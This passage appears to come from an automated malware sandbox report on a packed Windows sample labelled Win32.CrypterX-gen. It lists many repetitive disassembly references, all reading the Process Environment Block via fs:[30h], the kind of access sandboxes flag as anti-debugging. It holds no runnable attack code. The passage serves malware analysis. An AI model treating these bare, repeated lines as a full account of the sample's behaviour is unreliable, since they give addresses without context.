            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03138 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8966 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCE962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1951 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B490AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03880 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03880 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B058EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B070C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B070C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC18CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB0C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB0C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34020 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2F86D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B07057 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD9BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8BB6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1BA8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04B94 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B11B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B11B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B01BE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B353C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
